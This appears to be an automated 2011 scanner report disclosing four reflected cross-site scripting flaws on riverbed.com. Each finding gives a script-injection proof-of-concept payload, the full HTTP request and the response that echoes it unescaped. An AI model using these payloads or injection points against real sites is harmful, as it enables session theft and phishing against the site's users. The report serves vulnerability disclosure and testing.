XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, riverbed.com

Report generated by XSS.CX at Tue Nov 22 12:25:33 CST 2011.

Loading



1. Cross-site scripting (reflected)

1.1. http://www.riverbed.com/us/assets/images/favicon.ico [REST URL parameter 1]

1.2. http://www.riverbed.com/us/assets/images/favicon.ico [REST URL parameter 2]

1.3. http://www.riverbed.com/us/assets/images/favicon.ico [REST URL parameter 3]

1.4. http://www.riverbed.com/us/assets/images/favicon.ico [REST URL parameter 4]



1. Cross-site scripting (reflected)
There are 4 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.riverbed.com/us/assets/images/favicon.ico [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.riverbed.com
Path:   /us/assets/images/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e24c5"><script>alert(1)</script>1c00381f57 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /use24c5"><script>alert(1)</script>1c00381f57/assets/images/favicon.ico HTTP/1.1
Host: www.riverbed.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: CakeCookie[locale]=Q2FrZQ%3D%3D.nj4%3D; CakeCookie[language]=Q2FrZQ%3D%3D.jiPV; suggestions_nav[suggestions_nav]=Q2FrZQ%3D%3D.ineCZ6NZ; mbox=check#true#1321830749|session#1321830688419-402639#1321832549|PC#1321830688419-402639.19#1323040291; __utma=166550461.1608352373.1321830689.1321830689.1321830689.1; __utmb=166550461.1.10.1321830689; __utmz=166550461.1321830689.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cookiesEnabled=true; fsr.s={"v":1,"rid":"1321830696882_993323","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":3,"c":"http://www.riverbed.com/us/","pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"cd":0,"sd":0}; __utmc=166550461

Response (redirected)

HTTP/1.0 404 Not Found
Date: Sun, 20 Nov 2011 23:36:37 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: CakeCookie[locale]=Q2FrZQ%3D%3D.nj4%3D; expires=Tue, 20-Dec-2011 23:36:38 GMT; path=/
Set-Cookie: CakeCookie[language]=Q2FrZQ%3D%3D.jiPV; expires=Tue, 20-Dec-2011 23:36:38 GMT; path=/
Vary: Accept-Encoding
Content-Length: 36340
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<img src="/tracker/url/0096954085/use24c5"><script>alert(1)</script>1c00381f57/assets/images/favicon.ico" width="1" height="1" alt="" />
...[SNIP]...

1.2. http://www.riverbed.com/us/assets/images/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.riverbed.com
Path:   /us/assets/images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0977"><script>alert(1)</script>5da518b5de8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/assetse0977"><script>alert(1)</script>5da518b5de8/images/favicon.ico HTTP/1.1
Host: www.riverbed.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: CakeCookie[locale]=Q2FrZQ%3D%3D.nj4%3D; CakeCookie[language]=Q2FrZQ%3D%3D.jiPV; suggestions_nav[suggestions_nav]=Q2FrZQ%3D%3D.ineCZ6NZ; mbox=check#true#1321830749|session#1321830688419-402639#1321832549

Response

HTTP/1.0 404 Not Found
Date: Sun, 20 Nov 2011 23:12:06 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: CakeCookie[locale]=Q2FrZQ%3D%3D.nj4%3D; expires=Tue, 20-Dec-2011 23:12:06 GMT; path=/
Set-Cookie: CakeCookie[language]=Q2FrZQ%3D%3D.jiPV; expires=Tue, 20-Dec-2011 23:12:06 GMT; path=/
Vary: Accept-Encoding
Content-Length: 36334
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<img src="/tracker/url/0006599643/assetse0977"><script>alert(1)</script>5da518b5de8/images/favicon.ico" width="1" height="1" alt="" />
...[SNIP]...

1.3. http://www.riverbed.com/us/assets/images/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.riverbed.com
Path:   /us/assets/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed5c3"><script>alert(1)</script>85ef5e5e146 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/assets/imagesed5c3"><script>alert(1)</script>85ef5e5e146/favicon.ico HTTP/1.1
Host: www.riverbed.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: CakeCookie[locale]=Q2FrZQ%3D%3D.nj4%3D; CakeCookie[language]=Q2FrZQ%3D%3D.jiPV; suggestions_nav[suggestions_nav]=Q2FrZQ%3D%3D.ineCZ6NZ; mbox=check#true#1321830749|session#1321830688419-402639#1321832549

Response

HTTP/1.0 404 Not Found
Date: Sun, 20 Nov 2011 23:12:07 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: CakeCookie[locale]=Q2FrZQ%3D%3D.nj4%3D; expires=Tue, 20-Dec-2011 23:12:08 GMT; path=/
Set-Cookie: CakeCookie[language]=Q2FrZQ%3D%3D.jiPV; expires=Tue, 20-Dec-2011 23:12:08 GMT; path=/
Vary: Accept-Encoding
Content-Length: 36334
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<img src="/tracker/url/0447471484/assets/imagesed5c3"><script>alert(1)</script>85ef5e5e146/favicon.ico" width="1" height="1" alt="" />
...[SNIP]...

1.4. http://www.riverbed.com/us/assets/images/favicon.ico [REST URL parameter 4]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.riverbed.com
Path:   /us/assets/images/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd207"><script>alert(1)</script>d6593b5e4ba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/assets/images/favicon.icodd207"><script>alert(1)</script>d6593b5e4ba HTTP/1.1
Host: www.riverbed.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: CakeCookie[locale]=Q2FrZQ%3D%3D.nj4%3D; CakeCookie[language]=Q2FrZQ%3D%3D.jiPV; suggestions_nav[suggestions_nav]=Q2FrZQ%3D%3D.ineCZ6NZ; mbox=check#true#1321830749|session#1321830688419-402639#1321832549

Response

HTTP/1.0 404 Not Found
Date: Sun, 20 Nov 2011 23:12:08 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: CakeCookie[locale]=Q2FrZQ%3D%3D.nj4%3D; expires=Tue, 20-Dec-2011 23:12:08 GMT; path=/
Set-Cookie: CakeCookie[language]=Q2FrZQ%3D%3D.jiPV; expires=Tue, 20-Dec-2011 23:12:08 GMT; path=/
Vary: Accept-Encoding
Content-Length: 36334
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<img src="/tracker/url/0927841085/assets/images/favicon.icodd207"><script>alert(1)</script>d6593b5e4ba" width="1" height="1" alt="" />
...[SNIP]...

Report generated by XSS.CX at Tue Nov 22 12:25:33 CST 2011.